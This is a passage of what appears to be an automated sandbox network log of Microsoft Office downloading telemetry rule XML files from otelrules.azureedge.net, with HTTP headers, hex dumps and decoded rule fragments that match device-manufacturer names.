                                                                                                                                                                                              x-azure-ref: 20241124T123926Z-178bfbc474bw8bwphC1NYC38b400000005xg00000000010x
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:26 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              39192.168.2.64974813.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:26 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:26 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 415
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                              ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                              x-ms-request-id: 87817176-601e-003e-034d-3c3248000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123926Z-178bfbc474bwh9gmhC1NYCy3rs000000063g00000000395k
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:26 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              40192.168.2.64975013.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:26 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:26 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 419
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                              x-ms-request-id: a8d62205-901e-0083-0c0e-3bbb55000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123926Z-174c587ffdf6b487hC1TEBydsn00000004d0000000006yvm
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:26 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              41192.168.2.64975113.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:26 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:26 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 494
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB8972972"
                                                                                                                                                                                              x-ms-request-id: 375df28d-601e-00ab-5b0b-3d66f4000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123926Z-178bfbc474bfw4gbhC1NYCunf400000005y0000000008shh
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:26 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              42192.168.2.64975313.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:28 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:28 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 420
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                              ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                              x-ms-request-id: 81672928-a01e-001e-4184-3b49ef000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123928Z-174c587ffdfks6tlhC1TEBeza400000004k0000000005snq
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:28 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              43192.168.2.64975513.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:28 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:28 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 427
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                              ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                              x-ms-request-id: 3c6e4b4f-901e-005b-7308-3d2005000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123928Z-178bfbc474bpscmfhC1NYCfc2c00000004eg00000000c5qu
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:28 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              44192.168.2.64975613.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:28 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:28 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 486
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                              ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                              x-ms-request-id: 95b9e869-801e-008c-3081-3b7130000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123928Z-174c587ffdfldtt2hC1TEBwv9c000000045000000000nbcp
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:28 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              45192.168.2.64975413.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:28 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:28 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 472
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                              ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                              x-ms-request-id: 64264af0-501e-005b-1fb0-3dd7f7000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123928Z-174c587ffdfdwxdvhC1TEB1c4n00000004cg000000007gmm
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:28 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              46192.168.2.64975713.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:28 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:29 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 423
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                              x-ms-request-id: d83ea369-501e-000a-040c-3d0180000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123929Z-178bfbc474bh5zbqhC1NYCkdug00000005tg00000000bv9t
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:29 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              47192.168.2.64975813.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:30 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:30 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 478
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                              ETag: "0x8DC582B9B233827"
                                                                                                                                                                                              x-ms-request-id: 4b4d3db7-601e-003d-0147-3c6f25000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123930Z-178bfbc474bp8mkvhC1NYCzqnn00000005u0000000006svc
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:30 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              48192.168.2.64975913.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:30 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
